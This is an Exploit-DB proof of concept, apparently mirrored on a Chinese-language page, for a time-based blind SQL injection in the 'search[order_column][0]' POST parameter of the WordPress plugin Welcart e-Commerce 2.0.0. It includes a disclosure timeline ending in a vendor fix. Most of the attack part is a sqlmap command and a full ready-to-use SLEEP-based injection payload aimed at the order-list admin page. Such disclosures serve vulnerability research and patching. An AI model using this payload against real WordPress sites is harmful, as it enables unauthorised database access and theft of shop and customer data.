WordPress Plugin Welcart e-Commerce 2.0.0 – ‘search[order_column][0]’ SQL injection

  • 作者: Erik David Martin
    日期: 2021-02-08
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/49531/
  • # Exploit Title: WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection
    # Date: 04/08 2020
    # Exploit Author: Erik David Martin
    # Vendor Homepage: https://www.welcart.com/
    # Software Link: https://downloads.wordpress.org/plugin/usc-e-shop.2.0.0.zip
    # Category: Web Application
    # Version: 2.0.0
    # Tested on: Ubuntu 18.04.04 LTS / WordPress 5.4.2
    # 05/08 2020: Vendor notified
    # 06/08 2020: Vendor requested detailed information
    # 06/08 2020: Information provided
    # 11/08 2020: Vendor notified that a patch will be provided. No current ETA
    # 10/12 2020: Vulnerability fixed
    # 1. Description
    The POST parameter "search[order_column][0]" does not sanitize user input when searching through the order lists.
    # 2. Proof of Concept (PoC)
    Use ZAP/Burp to capture the web request when searching through existing order lists and save it to request.txt
    sqlmap -r request.txt --dbms=mysql -p search[order_column][0]
    Parameter: search[order_column][0] (POST)
    	Type: time-based blind
    	Payload: search[order_column][0]=ID) AND (SELECT 9900 FROM (SELECT(SLEEP(5)))tKPd) AND (8867=8867&search[order_word][0]=test&search[order_word_term][0]=contain&search[order_term]=AND&search[order_column][1]=&search[order_word][1]=&search[order_word_term][1]=contain&search[product_column][0]=&search[product_word][0]=&search[product_word_term][0]=contain&search[product_term]=AND&search[product_column][1]=&search[product_word][1]=&search[product_word_term][1]=contain&searchIn=Search&allchange[column]=&collective=&wc_nonce=5e3ed8895f&_wp_http_referer=/wp-admin/admin.php?page=usces_orderlist